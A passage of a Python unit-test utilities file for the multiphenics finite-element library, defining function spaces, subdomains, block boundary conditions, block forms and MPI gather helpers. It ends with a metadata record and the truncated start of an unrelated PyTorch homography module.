pytest_mark_slow(lambda mesh: VectorFunctionSpace(mesh, \"Real\", 0)),\n pytest_mark_slow(lambda mesh: FunctionAndRealSpace(mesh, \"Lagrange\", 1)),\n pytest_mark_slow(lambda mesh: FunctionAndRealSpace(mesh, \"Lagrange\", 2))\n )\n\ndef get_function_spaces_2():\n return pytest_mark_slow_for_cartesian_product(get_function_spaces_1, get_function_spaces_1)\n\ndef get_elements_1():\n return (\n lambda mesh: FiniteElement(\"Lagrange\", mesh.ufl_cell(), 1),\n pytest_mark_slow(lambda mesh: FiniteElement(\"Lagrange\", mesh.ufl_cell(), 2)),\n lambda mesh: VectorElement(\"Lagrange\", mesh.ufl_cell(), 1),\n pytest_mark_slow(lambda mesh: VectorElement(\"Lagrange\", mesh.ufl_cell(), 2)),\n pytest_mark_slow(lambda mesh: TensorElement(\"Lagrange\", mesh.ufl_cell(), 1)),\n pytest_mark_slow(lambda mesh: TensorElement(\"Lagrange\", mesh.ufl_cell(), 2)),\n lambda mesh: StokesElement(\"Lagrange\", mesh.ufl_cell(), 1),\n pytest_mark_slow(lambda mesh: StokesElement(\"Lagrange\", mesh.ufl_cell(), 2)),\n lambda 
mesh: FiniteElement(\"Real\", mesh.ufl_cell(), 0),\n pytest_mark_slow(lambda mesh: VectorElement(\"Real\", mesh.ufl_cell(), 0)),\n pytest_mark_slow(lambda mesh: FunctionAndRealElement(\"Lagrange\", mesh.ufl_cell(), 1)),\n pytest_mark_slow(lambda mesh: FunctionAndRealElement(\"Lagrange\", mesh.ufl_cell(), 2))\n )\n\ndef get_elements_2():\n return pytest_mark_slow_for_cartesian_product(get_elements_1, get_elements_1)\n\n# ================ SUBDOMAIN GENERATOR ================ #\ndef UnitSquareSubDomain(X, Y):\n class CustomSubDomain(SubDomain):\n def inside(self, x, on_boundary):\n return x[0] <= X and x[1] <= Y\n return CustomSubDomain()\n\ndef UnitSquareInterface(X=None, Y=None, on_boundary=False):\n assert (\n (X is not None and Y is None and on_boundary is False)\n or\n (X is None and Y is not None and on_boundary is False)\n or\n (X is None and Y is None and on_boundary is True)\n )\n if X is not None:\n class CustomSubDomain(SubDomain):\n def inside(self, x, on_boundary_):\n return x[0] >= X - DOLFIN_EPS and x[0] <= X + DOLFIN_EPS\n elif Y is not None:\n class CustomSubDomain(SubDomain):\n def inside(self, x, on_boundary_):\n return x[1] >= Y - DOLFIN_EPS and x[1] <= Y + DOLFIN_EPS\n elif on_boundary:\n class CustomSubDomain(SubDomain):\n def inside(self, x, on_boundary_):\n return on_boundary_\n return CustomSubDomain()\n\ndef OnBoundary():\n return UnitSquareInterface(on_boundary=True)\n\ndef get_restrictions_1():\n return (\n None,\n UnitSquareSubDomain(0.5, 0.5),\n UnitSquareInterface(on_boundary=True),\n pytest_mark_slow(UnitSquareInterface(X=1.0)),\n pytest_mark_slow(UnitSquareInterface(Y=0.0)),\n UnitSquareInterface(X=0.75),\n pytest_mark_slow(UnitSquareInterface(Y=0.25))\n )\n\ndef get_restrictions_2():\n return (\n (None, None),\n (None, UnitSquareSubDomain(0.75, 0.75)),\n pytest_mark_slow((None, UnitSquareInterface(on_boundary=True))),\n (None, UnitSquareInterface(Y=0.0)),\n pytest_mark_slow((UnitSquareSubDomain(0.5, 0.75), None)),\n pytest_mark_slow((UnitSquareInterface(on_boundary=True), None)),\n pytest_mark_slow((UnitSquareInterface(X=1.0), None)),\n (UnitSquareSubDomain(0.75, 0.75), UnitSquareSubDomain(0.75, 0.75)),\n pytest_mark_slow((UnitSquareSubDomain(0.5, 0.75), UnitSquareSubDomain(0.75, 0.75))),\n pytest_mark_slow((UnitSquareInterface(on_boundary=True), UnitSquareInterface(on_boundary=True))),\n (UnitSquareInterface(on_boundary=True), UnitSquareInterface(X=1.0)),\n pytest_mark_slow((UnitSquareInterface(X=1.0), UnitSquareInterface(on_boundary=True))),\n (UnitSquareInterface(X=1.0), UnitSquareInterface(Y=0.0)),\n pytest_mark_slow((UnitSquareInterface(X=0.75), UnitSquareInterface(Y=0.0))),\n pytest_mark_slow((UnitSquareInterface(X=0.75), UnitSquareInterface(Y=0.25))),\n (UnitSquareSubDomain(0.5, 0.75), UnitSquareInterface(on_boundary=True)),\n pytest_mark_slow((UnitSquareSubDomain(0.5, 0.75), UnitSquareInterface(Y=0.25))),\n pytest_mark_slow((UnitSquareInterface(on_boundary=True), UnitSquareSubDomain(0.5, 0.75))),\n pytest_mark_slow((UnitSquareInterface(Y=0.25), UnitSquareSubDomain(0.5, 0.75)))\n )\n\n# ================ BLOCK BOUNDARY CONDITIONS GENERATOR ================ #\n# Computation of block bcs for single block\ndef get_block_bcs_1():\n def _get_bc_1(block_V):\n on_boundary = OnBoundary()\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n bc1_fun = Constant(1.)\n elif len(shape_1) == 1 and shape_1[0] == 2:\n bc1_fun = Constant((1., 2.))\n elif len(shape_1) == 1 and shape_1[0] == 3:\n bc1_fun = Constant((1., 2., 3.))\n elif len(shape_1) 
== 2:\n bc1_fun = Constant(((1., 2.),\n (3., 4.)))\n return DirichletBC(block_V.sub(0), bc1_fun, on_boundary)\n return (\n lambda block_V: None,\n pytest_mark_slow(lambda block_V: BlockDirichletBC([None], block_function_space=block_V)),\n lambda block_V: BlockDirichletBC([_get_bc_1(block_V)])\n )\n\n# Computation of block bcs for two blocks\ndef get_block_bcs_2():\n def _get_bc_1(block_V):\n on_boundary = OnBoundary()\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n bc1_fun = Constant(1.)\n elif len(shape_1) == 1 and shape_1[0] == 2:\n bc1_fun = Constant((1., 2.))\n elif len(shape_1) == 1 and shape_1[0] == 3:\n bc1_fun = Constant((1., 2., 3.))\n elif len(shape_1) == 2:\n bc1_fun = Constant(((1., 2.),\n (3., 4.)))\n return DirichletBC(block_V.sub(0), bc1_fun, on_boundary)\n def _get_bc_2(block_V):\n on_boundary = OnBoundary()\n shape_2 = block_V[1].ufl_element().value_shape()\n if len(shape_2) == 0:\n bc2_fun = Constant(11.)\n elif len(shape_2) == 1 and shape_2[0] == 2:\n bc2_fun = Constant((11., 12.))\n elif len(shape_2) == 1 and shape_2[0] == 3:\n bc2_fun = Constant((11., 12., 13.))\n elif len(shape_2) == 2:\n bc2_fun = Constant(((11., 12.),\n (13., 14.)))\n return DirichletBC(block_V.sub(1), bc2_fun, on_boundary)\n return (\n lambda block_V: None,\n pytest_mark_slow(lambda block_V: BlockDirichletBC([None, None], block_function_space=block_V)),\n lambda block_V: BlockDirichletBC([_get_bc_1(block_V), None]),\n pytest_mark_slow(lambda block_V: BlockDirichletBC([None, _get_bc_2(block_V)])),\n lambda block_V: BlockDirichletBC([_get_bc_1(block_V), _get_bc_2(block_V)])\n )\n\n# ================ RIGHT-HAND SIDE BLOCK FORM GENERATOR ================ #\n# Computation of rhs block form for single block\ndef get_rhs_block_form_1(block_V):\n block_v = BlockTestFunction(block_V)\n (v, ) = block_split(block_v)\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n f = Expression(\"2*x[0] + 4*x[1]*x[1]\", degree=2)\n block_form = [f*v*dx]\n elif len(shape_1) == 1 and shape_1[0] == 2:\n f = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"), degree=2)\n block_form = [inner(f, v)*dx]\n elif len(shape_1) == 1 and shape_1[0] == 3:\n f = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\", \"7*x[0] + 11*x[1]*x[1]\"), degree=2)\n block_form = [inner(f, v)*dx]\n elif len(shape_1) == 2:\n f = Expression(((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"),\n (\"7*x[0] + 11*x[1]*x[1]\", \"13*x[0] + 17*x[1]*x[1]\")), degree=2)\n block_form = [inner(f, v)*dx]\n return block_form\n\n# Computation of rhs block form for two blocks\ndef get_rhs_block_form_2(block_V):\n block_v = BlockTestFunction(block_V)\n (v1, v2) = block_split(block_v)\n block_form = [None, None]\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n f1 = Expression(\"2*x[0] + 4*x[1]*x[1]\", degree=2)\n block_form[0] = f1*v1*dx\n elif len(shape_1) == 1 and shape_1[0] == 2:\n f1 = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"), degree=2)\n block_form[0] = inner(f1, v1)*dx\n elif len(shape_1) == 1 and shape_1[0] == 3:\n f1 = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\", \"7*x[0] + 11*x[1]*x[1]\"), degree=2)\n block_form[0] = inner(f1, v1)*dx\n elif len(shape_1) == 2:\n f1 = Expression(((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"),\n (\"7*x[0] + 11*x[1]*x[1]\", \"13*x[0] + 17*x[1]*x[1]\")), degree=2)\n block_form[0] = inner(f1, v1)*dx\n shape_2 = block_V[1].ufl_element().value_shape()\n if len(shape_2) == 0:\n f2 
= Expression(\"2*x[1] + 4*x[0]*x[0]\", degree=2)\n block_form[1] = f2*v2*dx\n elif len(shape_2) == 1 and shape_2[0] == 2:\n f2 = Expression((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\"), degree=2)\n block_form[1] = inner(f2, v2)*dx\n elif len(shape_2) == 1 and shape_2[0] == 3:\n f2 = Expression((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\", \"7*x[1] + 11*x[0]*x[0]\"), degree=2)\n block_form[1] = inner(f2, v2)*dx\n elif len(shape_2) == 2:\n f2 = Expression(((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\"),\n (\"7*x[1] + 11*x[0]*x[0]\", \"13*x[1] + 17*x[0]*x[0]\")), degree=2)\n block_form[1] = inner(f2, v2)*dx\n return block_form\n\n# ================ LEFT-HAND SIDE BLOCK FORM GENERATOR ================ #\n# Computation of lhs block form for single block\ndef get_lhs_block_form_1(block_V):\n block_u = BlockTrialFunction(block_V)\n block_v = BlockTestFunction(block_V)\n (u, ) = block_split(block_u)\n (v, ) = block_split(block_v)\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n f = Expression(\"2*x[0] + 4*x[1]*x[1]\", degree=2)\n block_form = [[f*u*v*dx]]\n elif len(shape_1) == 1 and shape_1[0] == 2:\n f = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"), degree=2)\n block_form = [[(f[0]*u[0]*v[0] + f[1]*u[1].dx(1)*v[1])*dx]]\n elif len(shape_1) == 1 and shape_1[0] == 3:\n f = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\", \"7*x[0] + 11*x[1]*x[1]\"), degree=2)\n block_form = [[(f[0]*u[0]*v[0] + f[1]*u[1].dx(1)*v[1] + f[2]*u[2].dx(0)*v[2].dx(1))*dx]]\n elif len(shape_1) == 2:\n f = Expression(((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"),\n (\"7*x[0] + 11*x[1]*x[1]\", \"13*x[0] + 17*x[1]*x[1]\")), degree=2)\n block_form = [[(f[0, 0]*u[0, 0]*v[0, 0] + f[0, 1]*u[0, 1].dx(1)*v[0, 1] + f[1, 0]*u[1, 0].dx(0)*v[1, 0].dx(1) + f[1, 1]*u[1, 1].dx(0)*v[1, 1])*dx]]\n return block_form\n\n# Computation of lhs block form for two blocks\ndef get_lhs_block_form_2(block_V):\n block_u = BlockTrialFunction(block_V)\n block_v = BlockTestFunction(block_V)\n (u1, u2) = block_split(block_u)\n (v1, v2) = block_split(block_v)\n block_form = [[None, None], [None, None]]\n # (1, 1) block\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n f1 = Expression(\"2*x[0] + 4*x[1]*x[1]\", degree=2)\n block_form[0][0] = f1*u1*v1*dx\n elif len(shape_1) == 1 and shape_1[0] == 2:\n f1 = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"), degree=2)\n block_form[0][0] = (f1[0]*u1[0]*v1[0] + f1[1]*u1[1].dx(1)*v1[1])*dx\n elif len(shape_1) == 1 and shape_1[0] == 3:\n f1 = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\", \"7*x[0] + 11*x[1]*x[1]\"), degree=2)\n block_form[0][0] = (f1[0]*u1[0]*v1[0] + f1[1]*u1[1].dx(1)*v1[1] + f1[2]*u1[2].dx(0)*v1[2].dx(1))*dx\n elif len(shape_1) == 2:\n f1 = Expression(((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"),\n (\"7*x[0] + 11*x[1]*x[1]\", \"13*x[0] + 17*x[1]*x[1]\")), degree=2)\n block_form[0][0] = (f1[0, 0]*u1[0, 0]*v1[0, 0] + f1[0, 1]*u1[0, 1].dx(1)*v1[0, 1] + f1[1, 0]*u1[1, 0].dx(0)*v1[1, 0].dx(1) + f1[1, 1]*u1[1, 1].dx(0)*v1[1, 1])*dx\n # (2, 2) block\n shape_2 = block_V[1].ufl_element().value_shape()\n if len(shape_2) == 0:\n f2 = Expression(\"2*x[1] + 4*x[0]*x[0]\", degree=2)\n block_form[1][1] = f2*u2*v2*dx\n elif len(shape_2) == 1 and shape_2[0] == 2:\n f2 = Expression((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\"), degree=2)\n block_form[1][1] = (f2[0]*u2[0]*v2[0] + f2[1]*u2[1].dx(1)*v2[1])*dx\n elif len(shape_2) == 1 and shape_2[0] == 3:\n 
f2 = Expression((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\", \"7*x[1] + 11*x[0]*x[0]\"), degree=2)\n block_form[1][1] = (f2[0]*u2[0]*v2[0] + f2[1]*u2[1].dx(1)*v2[1] + f2[2]*u2[2].dx(0)*v2[2].dx(1))*dx\n elif len(shape_2) == 2:\n f2 = Expression(((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\"),\n (\"7*x[1] + 11*x[0]*x[0]\", \"13*x[1] + 17*x[0]*x[0]\")), degree=2)\n block_form[1][1] = (f2[0, 0]*u2[0, 0]*v2[0, 0] + f2[0, 1]*u2[0, 1].dx(1)*v2[0, 1] + f2[1, 0]*u2[1, 0].dx(0)*v2[1, 0].dx(1) + f2[1, 1]*u2[1, 1].dx(0)*v2[1, 1])*dx\n # (1, 2) and (2, 1) blocks\n if len(shape_1) == 0:\n if len(shape_2) == 0:\n block_form[0][1] = f1*u2*v1*dx\n block_form[1][0] = f2*u1*v2*dx\n elif len(shape_2) == 1 and shape_2[0] == 2:\n block_form[0][1] = f1*u2[0]*v1*dx + f1*u2[1]*v1.dx(1)*dx\n block_form[1][0] = (f2[0]*u1*v2[0] + f2[1]*u1.dx(1)*v2[1])*dx\n elif len(shape_2) == 1 and shape_2[0] == 3:\n block_form[0][1] = f1*u2[0]*v1*dx + f1*u2[1]*v1.dx(1)*dx + f1*u2[2]*v1*dx\n block_form[1][0] = (f2[0]*u1*v2[0] + f2[1]*u1.dx(1)*v2[1] + f2[2]*u1.dx(0)*v2[2].dx(1))*dx\n elif len(shape_2) == 2:\n block_form[0][1] = f1*u2[0, 0]*v1*dx + f1*u2[1, 1]*v1.dx(0)*dx\n block_form[1][0] = (f2[0, 0]*u1*v2[0, 0] + f2[0, 1]*u1.dx(1)*v2[0, 1] + f2[1, 0]*u1.dx(0)*v2[1, 0].dx(1) + f2[1, 1]*u1.dx(0)*v2[1, 1])*dx\n elif len(shape_1) == 1 and shape_1[0] == 2:\n if len(shape_2) == 0:\n block_form[0][1] = (f1[0]*u2*v1[0] + f1[1]*u2.dx(1)*v1[1])*dx\n block_form[1][0] = f2*u1[0]*v2*dx + f2*u1[1]*v2.dx(0)*dx\n elif len(shape_2) == 1 and shape_2[0] == 2:\n block_form[0][1] = (f1[0]*u2[0]*v1[0] + f1[1]*u2[1].dx(1)*v1[1])*dx\n block_form[1][0] = (f2[0]*u1[0]*v2[0] + f2[1]*u1[1].dx(1)*v2[1])*dx\n elif len(shape_2) == 1 and shape_2[0] == 3:\n block_form[0][1] = (f1[0]*u2[0]*v1[0] + f1[1]*u2[1].dx(1)*v1[1] + f1[0]*u2[2]*v1[0])*dx\n block_form[1][0] = (f2[0]*u1[0]*v2[0] + f2[1]*u1[1].dx(1)*v2[1] + f2[2]*u1[0].dx(0)*v2[2].dx(1))*dx\n elif len(shape_2) == 2:\n block_form[0][1] = (f1[0]*u2[0, 0]*v1[0] + f1[1]*u2[1, 1].dx(1)*v1[1])*dx\n block_form[1][0] = (f2[0, 0]*u1[0]*v2[0, 0] + f2[0, 1]*u1[0].dx(1)*v2[0, 1] + f2[1, 0]*u1[1].dx(0)*v2[1, 0].dx(1) + f2[1, 1]*u1[0].dx(0)*v2[1, 1])*dx\n elif len(shape_1) == 1 and shape_1[0] == 3:\n if len(shape_2) == 0:\n block_form[0][1] = (f1[0]*u2*v1[0] + f1[1]*u2.dx(1)*v1[1] + f1[2]*u2.dx(0)*v1[2].dx(1))*dx\n block_form[1][0] = f2*u1[0]*v2*dx + f2*u1[1]*v2.dx(1)*dx + f2*u1[2]*v2*dx\n elif len(shape_2) == 1 and shape_2[0] == 2:\n block_form[0][1] = (f1[0]*u2[0]*v1[0] + f1[1]*u2[1].dx(1)*v1[1] + f1[2]*u2[0].dx(0)*v1[2].dx(1))*dx\n block_form[1][0] = (f2[0]*u1[0]*v2[0] + f2[1]*u1[1].dx(1)*v2[1] + f2[1]*u1[2].dx(1)*v2[1])*dx\n elif len(shape_2) == 1 and shape_2[0] == 3:\n block_form[0][1] = (f1[0]*u2[0]*v1[0] + f1[1]*u2[1].dx(1)*v1[1] + f1[2]*u2[2].dx(0)*v1[2].dx(1))*dx\n block_form[1][0] = (f2[0]*u1[0]*v2[0] + f2[1]*u1[1].dx(1)*v2[1] + f2[2]*u1[2].dx(0)*v2[2].dx(1))*dx\n elif len(shape_2) == 2:\n block_form[0][1] = (f1[0]*u2[0, 0]*v1[0] + f1[1]*u2[1, 0].dx(1)*v1[1] + f1[2]*u2[0, 1].dx(0)*v1[2].dx(1) + f1[0]*u2[1, 1]*v1[0].dx(1))*dx\n block_form[1][0] = (f2[0, 0]*u1[0]*v2[0, 0] + f2[0, 1]*u1[1].dx(1)*v2[0, 1] + f2[1, 0]*u1[2].dx(0)*v2[1, 0].dx(1) + f2[1, 1]*u1[0].dx(0)*v2[1, 1])*dx\n elif len(shape_1) == 2:\n if len(shape_2) == 0:\n block_form[0][1] = (f1[0, 0]*u2*v1[0, 0] + f1[0, 1]*u2.dx(1)*v1[0, 1] + f1[1, 0]*u2.dx(0)*v1[1, 0].dx(1) + f1[1, 1]*u2.dx(0)*v1[1, 1])*dx\n block_form[1][0] = f2*u1[0, 0]*v2*dx + f2*u1[1, 1]*v2.dx(1)*dx\n elif len(shape_2) == 1 and shape_2[0] == 2:\n block_form[0][1] = (f1[0, 
0]*u2[0]*v1[0, 0] + f1[0, 1]*u2[0].dx(1)*v1[0, 1] + f1[1, 0]*u2[1].dx(0)*v1[1, 0].dx(1) + f1[1, 1]*u2[1].dx(0)*v1[1, 1])*dx\n block_form[1][0] = (f2[0]*u1[0, 0]*v2[0] + f2[1]*u1[1, 1].dx(1)*v2[1])*dx\n elif len(shape_2) == 1 and shape_2[0] == 3:\n block_form[0][1] = (f1[0, 0]*u2[0]*v1[0, 0] + f1[0, 1]*u2[1].dx(1)*v1[0, 1] + f1[1, 0]*u2[2].dx(0)*v1[1, 0].dx(1) + f1[1, 1]*u2[0].dx(0)*v1[1, 1])*dx\n block_form[1][0] = (f2[0]*u1[0, 0]*v2[0] + f2[1]*u1[1, 0].dx(1)*v2[1] + f2[2]*u1[0, 1].dx(0)*v2[2].dx(1) + f2[0]*u1[1, 1]*v2[0].dx(1))*dx\n elif len(shape_2) == 2:\n block_form[0][1] = (f1[0, 0]*u2[0, 0]*v1[0, 0] + f1[0, 1]*u2[0, 1].dx(1)*v1[0, 1] + f1[1, 0]*u2[1, 0].dx(0)*v1[1, 0].dx(1) + f1[1, 1]*u2[1, 1].dx(0)*v1[1, 1])*dx\n block_form[1][0] = (f2[0, 0]*u1[0, 0]*v2[0, 0] + f2[0, 1]*u1[0, 1].dx(1)*v2[0, 1] + f2[1, 0]*u1[1, 0].dx(0)*v2[1, 0].dx(1) + f2[1, 1]*u1[1, 1].dx(0)*v2[1, 1])*dx\n return block_form\n\n# ================ RIGHT-HAND SIDE BLOCK FORM ASSEMBLER ================ #\ndef assemble_and_block_assemble_vector(block_form):\n N = len(block_form)\n assert N in (1, 2)\n if N == 1:\n return assemble(block_form[0]), block_assemble(block_form)\n else:\n return (assemble(block_form[0]), assemble(block_form[1])), block_assemble(block_form)\n\ndef apply_bc_and_block_bc_vector(rhs, block_rhs, block_bcs):\n if block_bcs is None:\n return\n N = len(block_bcs)\n assert N in (1, 2)\n if N == 1:\n [bc.apply(rhs) for bc in block_bcs[0]]\n block_bcs.apply(block_rhs)\n else:\n [bc1.apply(rhs[0]) for bc1 in block_bcs[0]]\n [bc2.apply(rhs[1]) for bc2 in block_bcs[1]]\n block_bcs.apply(block_rhs)\n\ndef apply_bc_and_block_bc_vector_non_linear(rhs, block_rhs, block_bcs, block_V):\n if block_bcs is None:\n return (None, None)\n N = len(block_bcs)\n assert N in (1, 2)\n if N == 1:\n function = Function(block_V[0])\n [bc.apply(rhs, function.vector()) for bc in block_bcs[0]]\n block_function = BlockFunction(block_V)\n block_bcs.apply(block_rhs, block_function.block_vector())\n return (function, block_function)\n else:\n function1 = Function(block_V[0])\n [bc1.apply(rhs[0], function1.vector()) for bc1 in block_bcs[0]]\n function2 = Function(block_V[1])\n [bc2.apply(rhs[1], function2.vector()) for bc2 in block_bcs[1]]\n block_function = BlockFunction(block_V)\n block_bcs.apply(block_rhs, block_function.block_vector())\n return ((function1, function2), block_function)\n\n# ================ LEFT-HAND SIDE BLOCK FORM ASSEMBLER ================ #\ndef assemble_and_block_assemble_matrix(block_form):\n N = len(block_form)\n assert N in (1, 2)\n M = len(block_form[0])\n assert M == N\n if N == 1:\n return assemble(block_form[0][0]), block_assemble(block_form)\n else:\n return ((assemble(block_form[0][0]), assemble(block_form[0][1])), (assemble(block_form[1][0]), assemble(block_form[1][1]))), block_assemble(block_form)\n\ndef apply_bc_and_block_bc_matrix(lhs, block_lhs, block_bcs):\n if block_bcs is None:\n return\n N = len(block_bcs)\n assert N in (1, 2)\n if N == 1:\n [bc.apply(lhs) for bc in block_bcs[0]]\n block_bcs.apply(block_lhs)\n else:\n [bc0.apply(lhs[0][0]) for bc0 in block_bcs[0]]\n [bc0.zero(lhs[0][1]) for bc0 in block_bcs[0]]\n [bc1.zero(lhs[1][0]) for bc1 in block_bcs[1]]\n [bc1.apply(lhs[1][1]) for bc1 in block_bcs[1]]\n block_bcs.apply(block_lhs)\n\n# ================ BLOCK FUNCTIONS GENERATOR ================ #\n# Computation of block function for single block\ndef get_list_of_functions_1(block_V):\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n f = Expression(\"2*x[0] + 
4*x[1]*x[1]\", degree=2)\n elif len(shape_1) == 1 and shape_1[0] == 2:\n f = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"), degree=2)\n elif len(shape_1) == 1 and shape_1[0] == 3:\n f = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\", \"7*x[0] + 11*x[1]*x[1]\"), degree=2)\n elif len(shape_1) == 2:\n f = Expression(((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"),\n (\"7*x[0] + 11*x[1]*x[1]\", \"13*x[0] + 17*x[1]*x[1]\")), degree=2)\n return [project(f, block_V[0])]\n\n# Computation of block function for two blocks\ndef get_list_of_functions_2(block_V):\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n f1 = Expression(\"2*x[0] + 4*x[1]*x[1]\", degree=2)\n elif len(shape_1) == 1 and shape_1[0] == 2:\n f1 = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"), degree=2)\n elif len(shape_1) == 1 and shape_1[0] == 3:\n f1 = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\", \"7*x[0] + 11*x[1]*x[1]\"), degree=2)\n elif len(shape_1) == 2:\n f1 = Expression(((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"),\n (\"7*x[0] + 11*x[1]*x[1]\", \"13*x[0] + 17*x[1]*x[1]\")), degree=2)\n shape_2 = block_V[1].ufl_element().value_shape()\n if len(shape_2) == 0:\n f2 = Expression(\"2*x[1] + 4*x[0]*x[0]\", degree=2)\n elif len(shape_2) == 1 and shape_2[0] == 2:\n f2 = Expression((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\"), degree=2)\n elif len(shape_2) == 1 and shape_2[0] == 3:\n f2 = Expression((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\", \"7*x[1] + 11*x[0]*x[0]\"), degree=2)\n elif len(shape_2) == 2:\n f2 = Expression(((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\"),\n (\"7*x[1] + 11*x[0]*x[0]\", \"13*x[1] + 17*x[0]*x[0]\")), degree=2)\n return [project(f1, block_V[0]), project(f2, block_V[1])]\n\n# ================ PARALLEL SUPPORT ================ #\n# Gather matrices, vector and dicts on zero-th process\ndef allgather(obj, comm, **kwargs):\n assert isinstance(obj, (dict, tuple, GenericMatrix, GenericVector))\n if isinstance(obj, (dict, tuple)):\n assert \"block_dofmap\" in kwargs\n assert \"dofmap\" in kwargs\n if isinstance(obj, tuple):\n assert isinstance(kwargs[\"dofmap\"], tuple)\n all_block_to_original1 = comm.allgather(obj[0])\n all_ownership_ranges1 = comm.allgather(kwargs[\"dofmap\"][0].ownership_range())\n all_block_ownership_ranges1 = comm.allgather(kwargs[\"block_dofmap\"].sub_index_map(0).local_range())\n all_block_to_original2 = comm.allgather(obj[1])\n all_ownership_ranges2 = comm.allgather(kwargs[\"dofmap\"][1].ownership_range())\n all_block_ownership_ranges2 = comm.allgather(kwargs[\"block_dofmap\"].sub_index_map(1).local_range())\n base_index1 = [None]*comm.Get_size()\n block_base_index1 = [None]*comm.Get_size()\n base_index2 = [None]*comm.Get_size()\n block_base_index2 = [None]*comm.Get_size()\n for r in range(comm.Get_size() + 1):\n if r == 0:\n base_index1[0] = 0\n base_index2[0] = all_ownership_ranges1[-1][1]\n block_base_index1[0] = 0\n if r > 0:\n block_base_index2[r-1] = block_base_index1[r-1] + (all_block_ownership_ranges1[r-1][1] - all_block_ownership_ranges1[r-1][0])\n if r < comm.Get_size():\n base_index1[r] = all_ownership_ranges1[r-1][1]\n base_index2[r] = all_ownership_ranges1[-1][1] + all_ownership_ranges2[r-1][1]\n block_base_index1[r] = block_base_index2[r-1] + (all_block_ownership_ranges2[r-1][1] - all_block_ownership_ranges2[r-1][0])\n output = dict()\n for r in range(comm.Get_size()):\n for (block1, original1) in all_block_to_original1[r].items():\n if 
original1 < all_ownership_ranges1[r][1] - all_ownership_ranges1[r][0]:\n output[block1 + block_base_index1[r]] = original1 + base_index1[r]\n for (block2, original2) in all_block_to_original2[r].items():\n if original2 < all_ownership_ranges2[r][1] - all_ownership_ranges2[r][0]:\n # Note that we use block_base_index1 instead of block_base_index2 due to internal storage of block2\n output[block2 + block_base_index1[r]] = original2 + base_index2[r]\n return output\n else:\n assert isinstance(obj, dict)\n all_block_to_original1 = comm.allgather(obj)\n all_ownership_ranges1 = comm.allgather(kwargs[\"dofmap\"].ownership_range())\n all_block_ownership_ranges1 = comm.allgather(kwargs[\"block_dofmap\"].sub_index_map(0).local_range())\n base_index1 = [ownr[0] for ownr in all_ownership_ranges1]\n block_base_index1 = [ownr[0] for ownr in all_block_ownership_ranges1]\n output = dict()\n for r in range(comm.Get_size()):\n for (block1, original1) in all_block_to_original1[r].items():\n if original1 < all_ownership_ranges1[r][1] - all_ownership_ranges1[r][0]:\n output[block1 + block_base_index1[r]] = original1 + base_index1[r]\n return output\n elif isinstance(obj, GenericMatrix):\n return vstack(comm.allgather(obj.array()))\n elif isinstance(obj, GenericVector):\n return hstack(comm.allgather(obj.get_local()))\n else:\n raise AssertionError(\"Invalid arguments to allgather\")\n","repo_name":"multiphenics/multiphenics","sub_path":"tests/unit/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":35336,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"72"} +{"seq_id":"17667305802","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass ComputeHomography(nn.Module):\n\n def __init__(self, opts):\n super(ComputeHomography, self).__init__()\n self.opts = opts\n self.h, self.w = opts.height, opts.width\n self.num_depths = opts.num_planes\n self.depth_proposals = 1 / torch.linspace(1 / opts.near_plane, 1 / opts.far_plane, opts.num_planes)\n self.depth_proposals = self.depth_proposals.view(opts.num_planes)\n self.src_corner_pts = [torch.Tensor([(self.w - 1) * i, (self.h - 1) * j, 1]) for i in range(2) for j in range(2)]\n\n def 